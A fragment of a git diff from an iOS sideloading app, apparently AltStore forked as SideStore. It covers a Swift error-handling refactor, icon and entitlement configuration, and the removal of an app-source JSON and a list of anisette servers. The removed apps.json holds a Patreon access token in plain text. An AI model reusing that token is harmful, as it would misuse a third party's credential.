+                guard app.bundleIdentifier == self.context.bundleIdentifier else {
+                    throw VerificationError.mismatchedBundleIdentifiers(sourceBundleID: self.context.bundleIdentifier, app: app)
+                }
             }
             
             guard ProcessInfo.processInfo.isOperatingSystemAtLeast(app.minimumiOSVersion) else {
-                throw VerificationError.iOSVersionNotSupported(app)
+                throw VerificationError.iOSVersionNotSupported(app: app, requiredOSVersion: app.minimumiOSVersion)
             }
             
             if #available(iOS 13.5, *)
@@ -116,7 +161,7 @@ final class VerifyAppOperation: ResultOperation<Void>
                     let entitlements = try PropertyListSerialization.propertyList(from: entitlementsPlist.data(using: .utf8)!, options: [], format: nil) as! [String: Any]
                     
                     app.hasPrivateEntitlements = true
-                    let error = VerificationError.privateEntitlements(app, entitlements: entitlements)
+                    let error = VerificationError.privateEntitlements(entitlements, app: app)
                     self.process(error) { (result) in
                         self.finish(result.mapError { $0 as Error })
                     }
@@ -145,9 +190,10 @@ private extension VerifyAppOperation
         guard let presentingViewController = self.context.presentingViewController else { return completion(.failure(error)) }
         
         DispatchQueue.main.async {
-            switch error
+            switch error.code
             {
-            case .privateEntitlements(_, let entitlements):
+            case .privateEntitlements:
+                guard let entitlements = error.entitlements else { return completion(.failure(error)) }
                 let permissions = entitlements.keys.sorted().joined(separator: "\n")
                 let message = String(format: NSLocalizedString("""
                     You must allow access to these private permissions before continuing:
@@ -166,8 +212,7 @@ private extension VerifyAppOperation
                 }))
                 presentingViewController.present(alertController, animated: true, completion: nil)
                 
-            case .mismatchedBundleIdentifiers: return completion(.failure(error))
-            case .iOSVersionNotSupported: return completion(.failure(error))
+            case .mismatchedBundleIdentifiers, .iOSVersionNotSupported: return completion(.failure(error))
             }
         }
     }

AltStore/Resources/Assets.xcassets/AppIcon.appiconset/Contents.json

@@ -1 +1,158 @@
-{"images":[{"size":"60x60","expected-size":"180","filename":"180.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"40x40","expected-size":"80","filename":"80.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"40x40","expected-size":"120","filename":"120.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"60x60","expected-size":"120","filename":"120.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"57x57","expected-size":"57","filename":"57.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"1x"},{"size":"29x29","expected-size":"58","filename":"58.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"29x29","expected-size":"29","filename":"29.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"1x"},{"size":"29x29","expected-size":"87","filename":"87.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"57x57","expected-size":"114","filename":"114.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"20x20","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"20x20","expected-size":"60","filename":"60.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"1024x1024","filename":"1024.png","expected-size":"1024","idiom":"ios-marketing","folder":"Assets.xcassets/AppIcon.appiconset/","scale":"1x"},{"size":"40x40","expected-size":"80","filename":"80.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"72x72","expected-size":"72","filename":"72.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"76x76","expected-size":"152","filename":"152.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"50x50","expected-size":"100","filename":"100.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"29x29","expected-size":"58","filename":"58.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"76x76","expected-size":"76","filename":"76.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"29x29","expected-size":"29","filename":"29.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"50x50","expected-size":"50","filename":"50.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"72x72","expected-size":"144","filename":"144.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"40x40","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"83.5x83.5","expected-size":"167","filename":"167.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"20x20","expected-size":"20","filename":"20.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"20x20","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"}]}
+{
+  "images" : [
+    {
+      "filename" : "40.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "60.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "29.png",
+      "idiom" : "iphone",
+      "scale" : "1x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "58.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "87.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "80.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "120.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "57.png",
+      "idiom" : "iphone",
+      "scale" : "1x",
+      "size" : "57x57"
+    },
+    {
+      "filename" : "114.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "57x57"
+    },
+    {
+      "filename" : "120.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "60x60"
+    },
+    {
+      "filename" : "180.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "60x60"
+    },
+    {
+      "filename" : "20.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "40.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "29.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "58.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "40.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "80.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "50.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "50x50"
+    },
+    {
+      "filename" : "100.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "50x50"
+    },
+    {
+      "filename" : "72.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "72x72"
+    },
+    {
+      "filename" : "144.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "72x72"
+    },
+    {
+      "filename" : "76.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "76x76"
+    },
+    {
+      "filename" : "152.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "76x76"
+    },
+    {
+      "filename" : "167.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "83.5x83.5"
+    },
+    {
+      "filename" : "1024.png",
+      "idiom" : "ios-marketing",
+      "scale" : "1x",
+      "size" : "1024x1024"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

AltStore/Resources/Assets.xcassets/Riley.imageset/Contents.json

@@ -1,12 +0,0 @@
-{
-  "images" : [
-    {
-      "filename" : "riley.jpg",
-      "idiom" : "universal"
-    }
-  ],
-  "info" : {
-    "author" : "xcode",
-    "version" : 1
-  }
-}

AltStore/Resources/Assets.xcassets/Shane.imageset/Contents.json

@@ -1,12 +0,0 @@
-{
-  "images" : [
-    {
-      "filename" : "shane.jpeg",
-      "idiom" : "universal"
-    }
-  ],
-  "info" : {
-    "author" : "xcode",
-    "version" : 1
-  }
-}

AltStore/Resources/Assets.xcassets/SideStore.imageset/Contents.json

@@ -0,0 +1,21 @@
+{
+  "images" : [
+    {
+      "filename" : "1024.png",
+      "idiom" : "universal",
+      "scale" : "1x"
+    },
+    {
+      "idiom" : "universal",
+      "scale" : "2x"
+    },
+    {
+      "idiom" : "universal",
+      "scale" : "3x"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

AltStore/Resources/ReleaseEntitlements.plist

@@ -3,18 +3,18 @@
 <plist version="1.0">
 <dict>
 	<key>application-identifier</key>
-	<string>A72ZC8AJ5X.com.SideStore.AltStore</string>
+	<string>XYZ0123456.com.SideStore.SideStore</string>
 	<key>aps-environment</key>
 	<string>development</string>
 	<key>com.apple.developer.siri</key>
 	<true/>
 	<key>com.apple.developer.team-identifier</key>
-	<string>A72ZC8AJ5X</string>
+	<string>XYZ0123456</string>
 	<key>com.apple.security.application-groups</key>
 	<array>
-		<string>group.com.SideStore.AltStore</string>
+		<string>group.com.SideStore.SideStore</string>
 	</array>
 	<key>get-task-allow</key>
 	<true/>
 </dict>
-</plist>
+</plist>

AltStore/Resources/apps.json

@@ -1,269 +0,0 @@
-{
-  "name": "AltStore",
-  "identifier": "com.rileytestut.AltStore",
-  "sourceURL": "https://cdn.altstore.io/file/altstore/apps.json",
-  "apps": [
-    {
-      "name": "AltStore",
-      "bundleIdentifier": "com.rileytestut.AltStore",
-      "developerName": "Riley Testut",
-      "version": "1.5.1",
-      "versionDate": "2022-07-14T12:00:00-05:00",
-      "versionDescription": "This update fixes the following issues:\n\n• Using Apple IDs that contain capital letters\n• Using Apple IDs with 2FA enabled without any trusted devices\n• Repeatedly asking some users to sign in every refresh\n• \"Incorrect Apple ID or password\" error after changing Apple ID email address\n• “Application is missing application-identifier” error when sideloading or (de-)activating certain apps\n• Potential crash when receiving unknown error codes from AltServer",
-      "downloadURL": "https://cdn.altstore.io/file/altstore/apps/altstore/1_5_1.ipa",
-      "localizedDescription": "AltStore is an alternative app store for non-jailbroken devices. \n\nThis version of AltStore allows you to install Delta, an all-in-one emulator for iOS, as well as sideload other .ipa files from the Files app.",
-      "iconURL": "https://user-images.githubusercontent.com/705880/65270980-1eb96f80-dad1-11e9-9367-78ccd25ceb02.png",
-      "tintColor": "018084",
-      "size": 5465976,
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/78942028-acf54300-7a6d-11ea-821c-5bb7a9b3e73a.PNG",
-        "https://user-images.githubusercontent.com/705880/78942222-0fe6da00-7a6e-11ea-9f2a-dda16157583c.PNG",
-        "https://user-images.githubusercontent.com/705880/65605577-332cba80-df5e-11e9-9f00-b369ce974f71.PNG"
-      ],
-      "permissions": [
-        {
-          "type": "background-fetch",
-          "usageDescription": "AltStore periodically refreshes apps in the background to prevent them from expiring."
-        },
-        {
-          "type": "background-audio",
-          "usageDescription": "Allows AltStore to run longer than 30 seconds when refreshing apps in background."
-        }
-      ]
-    },
-    {
-      "name": "AltStore",
-      "bundleIdentifier": "com.rileytestut.AltStore.Beta",
-      "developerName": "Riley Testut",
-      "subtitle": "An alternative App Store for iOS.",
-      "version": "1.6b2",
-      "versionDate": "2022-09-21T13:00:00-05:00",
-      "versionDescription": "• Fixed “error migrating persistent store” issue on launch\n\nPREVIOUS VERSION\n\nLock Screen Widget (iOS 16+)\n• Counts down days until AltStore expires\n• Comes in 2 different styles: “icon” and “text”\n\nError Log\n• View past errors in more detail\n• Tap an error to copy the error message or error code\n• Search for error code directly in AltStore FAQ",
-      "downloadURL": "https://cdn.altstore.io/file/altstore/apps/altstore/1_6_b2.ipa",
-      "localizedDescription": "AltStore is an alternative app store for non-jailbroken devices. \n\nThis beta release of AltStore adds support for 3rd party sources, allowing you to download apps from other developers directly through AltStore.",
-      "iconURL": "https://user-images.githubusercontent.com/705880/65270980-1eb96f80-dad1-11e9-9367-78ccd25ceb02.png",
-      "tintColor": "018084",
-      "size": 5465933,
-      "beta": true,
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/78942028-acf54300-7a6d-11ea-821c-5bb7a9b3e73a.PNG",
-        "https://user-images.githubusercontent.com/705880/78942222-0fe6da00-7a6e-11ea-9f2a-dda16157583c.PNG",
-        "https://user-images.githubusercontent.com/705880/65605577-332cba80-df5e-11e9-9f00-b369ce974f71.PNG"
-      ],
-      "permissions": [
-        {
-          "type": "background-fetch",
-          "usageDescription": "AltStore periodically refreshes apps in the background to prevent them from expiring."
-        },
-        {
-          "type": "background-audio",
-          "usageDescription": "Allows AltStore to run longer than 30 seconds when refreshing apps in background."
-        }
-      ]
-    },
-    {
-      "name": "Delta",
-      "bundleIdentifier": "com.rileytestut.Delta",
-      "developerName": "Riley Testut",
-      "subtitle": "Classic games in your pocket.",
-      "version": "1.3.1",
-      "versionDate": "2021-12-02T13:30:00-08:00",
-      "versionDescription": "• Fixes game artwork not loading\n• Fixes using deprecated DeSmuME core over melonDS core for some users",
-      "downloadURL": "https://cdn.altstore.io/file/altstore/apps/delta/1_3_1.ipa",
-      "localizedDescription": "Delta is an all-in-one emulator for iOS. Delta builds upon the strengths of its predecessor, GBA4iOS, while expanding to include support for more game systems such as NES, SNES, and N64.\n\nFEATURES\n\nSupported Game Systems\n• Nintendo Entertainment System\n• Super Nintendo Entertainment System\n• Nintendo 64\n• Game Boy (Color)\n• Game Boy Advance\n• Nintendo DS\n• And plenty more to come!\n\nController Support\n• Supports PS4, PS5, Xbox One S, Xbox Series X, and MFi game controllers.\n• Supports bluetooth (and wired) keyboards, as well as the Apple Smart Keyboard.\n• Completely customize button mappings on a per-system, per-controller basis.\n• Map buttons to special “Quick Save”, “Quick Load,” and “Fast Forward” actions.\n\nSave States\n• Save and load save states for any game from the pause menu.\n• Lock save states to prevent them from being accidentally overwritten.\n• Automatically makes backup save states to ensure you never lose your progress.\n• Support for “Quick Saves,” save states that can be quickly saved/loaded with a single button press (requires external controller).\n\nCheats\n• Supports various types of cheat codes for each supported system:\n• NES: Game Genie\n• SNES: Game Genie, Pro Action Replay\n• N64: GameShark\n• GBC: Game Genie, GameShark\n• GBA: Action Replay, Code Breaker, GameShark\n• DS: Action Replay\n\nDelta Sync\n• Sync your games, game saves, save states, cheats, controller skins, and controller mappings between devices.\n• View version histories of everything you sync and optionally restore them to earlier versions.\n• Supports both Google Drive and Dropbox.\n\nCustom Controller Skins\n• Beautiful built-in controller skins for all systems.\n• Import controller skins made by others, or even make your own to share with the world!\n\nHold Button\n• Choose buttons for Delta to hold down on your behalf, freeing up your thumbs to press other buttons instead.\n• Perfect for games that typically require one button be held down constantly (ex: run button in Mario games, or the A button in Mario Kart).\n\nFast Forward\n• Speed through slower parts of games by running the game much faster than normal.\n• Easily enable or disable from the pause menu, or optionally with a mapped button on an external controller.\n\n3D/Haptic Touch\n• Use 3D or Haptic Touch to “peek” at games, save states, and cheat codes.\n• App icon shortcuts allow quick access to your most recently played games, or optionally customize the shortcuts to always include certain games.\n\nGame Artwork\n• Automatically displays appropriate box art for imported games.\n• Change a game’s artwork to anything you want, or select from the built-in game artwork database.\n\nMisc.\n• Gyroscope support (WarioWare: Twisted! only)\n• Microphone support (DS only)\n• Support for delta:// URL scheme to jump directly into a specific game.\n\n**Delta and AltStore LLC are in no way affiliated with Nintendo. The name \"Nintendo\" and all associated game console names are registered trademarks of Nintendo Co., Ltd.**",
-      "iconURL": "https://user-images.githubusercontent.com/705880/63391976-4d311700-c37a-11e9-91a8-4fb0c454413d.png",
-      "tintColor": "8A28F7",
-      "size": 19739373,
-      "permissions": [
-        {
-          "type": "photos",
-          "usageDescription": "Allows Delta to use images from your Photo Library as game artwork."
-        }
-      ],
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/65600448-f7d9be00-df54-11e9-9e3e-d4c31296da94.PNG",
-        "https://user-images.githubusercontent.com/705880/65813009-f2ae8600-e183-11e9-9eb7-704effc11173.png",
-        "https://user-images.githubusercontent.com/705880/65601117-58b5c600-df56-11e9-9c19-9a5ba5da54cf.PNG",
-        "https://user-images.githubusercontent.com/705880/65601125-5b182000-df56-11e9-9e7e-261480e893c0.PNG"
-      ]
-    },
-    {
-      "name": "Delta",
-      "bundleIdentifier": "com.rileytestut.Delta.Beta",
-      "developerName": "Riley Testut",
-      "subtitle": "Classic games in your pocket.",
-      "version": "1.4b2",
-      "versionDate": "2022-08-16T08:00:00-05:00",
-      "versionDescription": "NEW\n• Supports Split View and Stage Manager multitasking on iPad\n• Automatically pauses + resumes emulation when switching between foreground apps with Stage Manager\n• Optimized full screen-width controller skins when using Split View, Slide Over, or Stage Manager\n• Supports controller skins with new `placement` parameter\n• Supports controller skins with custom screens that don’t have explicit `outputFrame`\n\nFIXED\n• Fixed not detecting keyboard presses when remapping inputs\n• Fixed potential crash rendering game screen after changing EAGLContext\n• Fixed incorrect game screen frame when software keyboard appears on iOS 16\n• Fixed software keyboard sometimes appearing when not emulating anything",
-      "downloadURL": "https://cdn.altstore.io/file/altstore/apps/delta/1_4_b2.ipa",
-      "localizedDescription": "The next consoles for Delta are coming: this beta version of Delta brings support for playing Nintendo DS and Sega Genesis games!\n\nPlease report any issues you find to support@altstore.io. Thanks!",
-      "iconURL": "https://user-images.githubusercontent.com/705880/63391976-4d311700-c37a-11e9-91a8-4fb0c454413d.png",
-      "tintColor": "8A28F7",
-      "size": 42968657,
-      "beta": true,
-      "permissions": [
-        {
-          "type": "photos",
-          "usageDescription": "Allows Delta to use images from your Photo Library as game artwork."
-        }
-      ],
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/65600448-f7d9be00-df54-11e9-9e3e-d4c31296da94.PNG",
-        "https://user-images.githubusercontent.com/705880/65601942-e5ad4f00-df57-11e9-9255-1463e0296e46.PNG",
-        "https://user-images.githubusercontent.com/705880/65813009-f2ae8600-e183-11e9-9eb7-704effc11173.png",
-        "https://user-images.githubusercontent.com/705880/65601117-58b5c600-df56-11e9-9c19-9a5ba5da54cf.PNG"
-      ]
-    },
-    {
-      "name": "Clip",
-      "bundleIdentifier": "com.rileytestut.Clip",
-      "subtitle": "Manage your clipboard history with ease.",
-      "developerName": "Riley Testut",
-      "version": "1.0",
-      "versionDate": "2020-06-17T12:30:00-07:00",
-      "versionDescription": "Initial version 🎉",
-      "downloadURL": "https://f000.backblazeb2.com/file/altstore/apps/clip/1_0.ipa",
-      "localizedDescription": "Clip is a simple clipboard manager for iOS. \n\nUnlike other clipboard managers, Clip can continue monitoring your clipboard while in the background. No longer do you need to remember to manually open or share to an app to save your clipboard; just copy and paste as you would normally do, and Clip will have your back.\n\nIn addition to background monitoring, Clip also has these features:\n\n• Save text, URLs, and images copied to the clipboard.\n• Copy, delete, or share any clippings saved to Clip.\n• Customizable history limit.\n\nDownload Clip today, and never worry about losing your clipboard again!",
-      "iconURL": "https://user-images.githubusercontent.com/705880/63391981-5326f800-c37a-11e9-99d8-760fd06bb601.png",
-      "tintColor": "EC008C",
-      "size": 445056,
-      "permissions": [
-        {
-          "type": "background-audio",
-          "usageDescription": "Allows Clip to continuously monitor your clipboard in the background."
-        }
-      ],
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/63391950-34286600-c37a-11e9-965f-832efe3da507.png",
-        "https://user-images.githubusercontent.com/705880/70830209-8e738980-1da4-11ea-8b3b-6e5fbc78adff.png"
-      ]
-    },
-    {
-      "name": "Clip",
-      "bundleIdentifier": "com.rileytestut.Clip.Beta",
-      "subtitle": "Manage your clipboard history with ease.",
-      "developerName": "Riley Testut",
-      "version": "1.1b1",
-      "versionDate": "2020-06-17T12:30:00-07:00",
-      "versionDescription": "This update adds a Custom Keyboard app extension for quick access to clippings when editing text.\n\nTo enable the keyboard, go to Settings > General > Keyboard > Keyboards > Add New Keyboard... and add \"ClipBoard\". Once added, make sure to then enable \"Allow Full Access\" for ClipBoard so it can access your clippings.",
-      "downloadURL": "https://f000.backblazeb2.com/file/altstore/apps/clip/1_1_b1.ipa",
-      "localizedDescription": "Clip is a simple clipboard manager for iOS. \n\nUnlike other clipboard managers, Clip can continue monitoring your clipboard while in the background. No longer do you need to remember to manually open or share to an app to save your clipboard; just copy and paste as you would normally do, and Clip will have your back.\n\nIn addition to background monitoring, Clip also has these features:\n\n• Save text, URLs, and images copied to the clipboard.\n• Copy, delete, or share any clippings saved to Clip.\n• Customizable history limit.\n\nDownload Clip today, and never worry about losing your clipboard again!",
-      "iconURL": "https://user-images.githubusercontent.com/705880/63391981-5326f800-c37a-11e9-99d8-760fd06bb601.png",
-      "tintColor": "EC008C",
-      "size": 462771,
-      "beta": true,
-      "permissions": [
-        {
-          "type": "background-audio",
-          "usageDescription": "Allows Clip to continuously monitor your clipboard in the background."
-        }
-      ],
-      "screenshotURLs": [
-        "https://user-images.githubusercontent.com/705880/63391950-34286600-c37a-11e9-965f-832efe3da507.png",
-        "https://user-images.githubusercontent.com/705880/70830209-8e738980-1da4-11ea-8b3b-6e5fbc78adff.png",
-        "https://user-images.githubusercontent.com/705880/84842227-70a80b00-aff9-11ea-8b04-bedb1f49c4a7.PNG",
-        "https://user-images.githubusercontent.com/705880/84842231-7271ce80-aff9-11ea-9272-e128aeceb95b.PNG"
-      ]
-    }
-  ],
-  "news": [
-    {
-      "title": "Delta Gaining DS Support",
-      "identifier": "delta-ds-support",
-      "caption": "Available this Saturday for patrons, coming soon for everyone else.",
-      "tintColor": "8A28F7",
-      "imageURL": "https://user-images.githubusercontent.com/705880/65603159-0676a400-df5a-11e9-882e-dc5566f4d50a.png",
-      "date": "2019-09-25",
-      "notify": false
-    },
-    {
-      "title": "Delta Now Available",
-      "identifier": "delta-now-available",
-      "caption": "Finally, relive your favorite NES, SNES, GB(C), GBA, and N64 games.",
-      "tintColor": "8A28F7",
-      "imageURL": "https://user-images.githubusercontent.com/705880/65604130-c1ec0800-df5b-11e9-8150-7657c474e3c3.png",
-      "appID": "com.rileytestut.Delta",
-      "date": "2019-09-28",
-      "notify": true
-    },
-    {
-      "title": "Sideloading is Here!",
-      "identifier": "sideloading-is-here",
-      "caption": "Update to AltStore 1.3 to install any app directly from Files.",
-      "tintColor": "018084",
-      "imageURL": "https://user-images.githubusercontent.com/705880/79022069-02932380-7b32-11ea-8bad-49907cb97ece.png",
-      "date": "2020-04-10T13:00:00-07:00",
-      "notify": true
-    },
-    {
-      "title": "iOS 13.4 Fixes App Crashes",
-      "identifier": "ios-13-4-now-available",
-      "caption": "Update to iOS 13.4 to fix some sideloaded apps crashing on launch.",
-      "tintColor": "34C759",
-      "date": "2020-04-10T13:30:00-07:00",
-      "notify": false
-    },
-    {
-      "title": "Clip Now Available!",
-      "identifier": "clip-now-available",
-      "caption": "Finally, a clipboard manager that can run in the background — no jailbreak required.",
-      "tintColor": "EC008C",
-      "imageURL": "https://user-images.githubusercontent.com/705880/65606598-04afdf00-df60-11e9-8f93-af6345d39557.png",
-      "appID": "com.rileytestut.Clip",
-      "date": "2020-06-17",
-      "notify": true
-    },
-    {
-      "title": "Delta, Meet Nintendo DS",
-      "identifier": "delta-meet-ds",
-      "caption": "Update to Delta 1.3 to relive all your favorite Nintendo DS games.",
-      "tintColor": "8A28F7",
-      "imageURL": "https://user-images.githubusercontent.com/705880/115617602-6ce2b600-a2a6-11eb-984e-2197a30c71e2.png",
-      "appID": "com.rileytestut.Delta",
-      "date": "2021-04-21",
-      "notify": true
-    },
-    {
-      "title": "#StandWithUkraine",
-      "identifier": "support-ukraine",
-      "caption": "Find out how you can help support those impacted by the Russian invasion.",
-      "tintColor": "003e80",
-      "imageURL": "https://user-images.githubusercontent.com/705880/156053447-a158cac7-df5f-4497-8025-15c3c2e10b48.png",
-      "url": "https://linktr.ee/razomforukraine",
-      "date": "2022-03-01",
-      "notify": false
-    },
-    {
-      "title": "The Biggest AltServer Update Yet!",
-      "identifier": "altserver-1-5",
-      "caption": "Update to AltServer 1.5 to use AltJIT and other exciting new features.",
-      "tintColor": "018084",
-      "imageURL": "https://user-images.githubusercontent.com/705880/166509576-744be578-6868-4b7d-b4fd-b9418c084327.png",
-      "url": "https://faq.altstore.io/release-notes/altserver",
-      "date": "2022-05-03",
-      "notify": true
-    },
-    {
-      "title": "More Apps in AltStore!",
-      "identifier": "trusted-sources",
-      "caption": "Update to AltStore 1.5 to easily download some of our favorite apps.",
-      "tintColor": "00CAB3",
-      "imageURL": "https://user-images.githubusercontent.com/705880/167026375-ddcb004f-7160-405c-b3e3-87a6795d2f43.png",
-      "url": "https://faq.altstore.io/release-notes/altstore",
-      "date": "2022-05-05",
-      "notify": true
-    },
-    {
-      "title": "New to AltStore?",
-      "identifier": "updated-faq",
-      "caption": "Check out our updated guide to learn how to sideload apps!",
-      "tintColor": "018084",
-      "url": "https://faq.altstore.io",
-      "date": "2022-07-28",
-      "notify": false
-    }
-  ],
-  "userInfo": {
-    "patreonAccessToken": "uqoDoTxH8dY1ImE8tK76wxrzKk67gjyjBAcK8sD3RLU"
-  }
-}

AltStore/Settings.bundle/Root.plist

@@ -1,79 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-	<key>StringsTable</key>
-	<string>Root</string>
-	<key>ApplicationGroupContainerIdentifier</key>
-	<string>group.$(APP_GROUP_IDENTIFIER)</string>
-	<key>PreferenceSpecifiers</key>
-	<array>
-		<dict>
-			<key>Type</key>
-			<string>PSMultiValueSpecifier</string>
-			<key>Title</key>
-			<string>Anisette Server</string>
-			<key>Key</key>
-			<string>customAnisetteURL</string>
-			<key>DefaultValue</key>
-			<string>https://ani.sidestore.io</string>
-			<key>Titles</key>
-			<array>
-				<string>SideStore</string>
-				<string>Macley (US)</string>
-				<string>Macley (DE)</string>
-				<string>DrPudding</string>
-				<string>Sideloadly</string>
-				<string>Nick</string>
-				<string>Jawshoeadan</string>
-				<string>crystall1nedev</string>
-			</array>
-			<key>Values</key>
-			<array>
-				<string>https://ani.sidestore.io</string>
-				<string>http://us1.sternserv.tech</string>
-				<string>http://de1.sternserv.tech</string>
-				<string>https://sign.rheaa.xyz</string>
-				<string>https://sideloadly.io/anisette/irGb3Quww8zrhgqnzmrx</string>
-				<string>http://45.33.29.114</string>
-				<string>https://anisette.jawshoeadan.me</string>
-				<string>https://anisette.crystall1ne.software/</string>
-			</array>
-		</dict>
-		<dict>
-			<key>Type</key>
-			<string>PSGroupSpecifier</string>
-			<key>Title</key>
-			<string>Danger Zone</string>
-			<key>FooterText</key>
-			<string>If you disable the toggle then app will use the server you input into the &quot;Anisette URL&quot; box rather than one selected from the above selector.</string>
-		</dict>
-		<dict>
-			<key>Type</key>
-			<string>PSToggleSwitchSpecifier</string>
-			<key>Title</key>
-			<string>Use preferred servers</string>
-			<key>Key</key>
-			<string>textServer</string>
-			<key>DefaultValue</key>
-			<true/>
-			<key>FooterText</key>
-			<string>chicken</string>
-		</dict>
-		<dict>
-			<key>Type</key>
-			<string>PSTextFieldSpecifier</string>
-			<key>Title</key>
-			<string>Anisette URL</string>
-			<key>Key</key>
-			<string>textInputAnisetteURL</string>
-			<key>AutocapitalizationType</key>
-			<string>None</string>
-			<key>AutocorrectionType</key>
-			<string>No</string>
-			<key>KeyboardType</key>
-			<string>URL</string>
-		</dict>
-	</array>
-</dict>
-</plist>

AltStore/Settings/AboutPatreonHeaderView.xib

@@ -1,27 +1,27 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="21225" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="21507" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
     <device id="retina6_1" orientation="portrait" appearance="light"/>
     <dependencies>
         <deployment identifier="iOS"/>
-        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21207"/>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21505"/>
         <capability name="Named colors" minToolsVersion="9.0"/>
         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
     </dependencies>
     <objects>
         <placeholder placeholderIdentifier="IBFilesOwner" id="-1" userLabel="File's Owner"/>
         <placeholder placeholderIdentifier="IBFirstResponder" id="-2" customClass="UIResponder"/>
-        <collectionReusableView opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" reuseIdentifier="AboutHeader" id="xq2-Pl-zaG" customClass="AboutPatreonHeaderView" customModule="AltStore" customModuleProvider="target">
-            <rect key="frame" x="0.0" y="0.0" width="375" height="445"/>
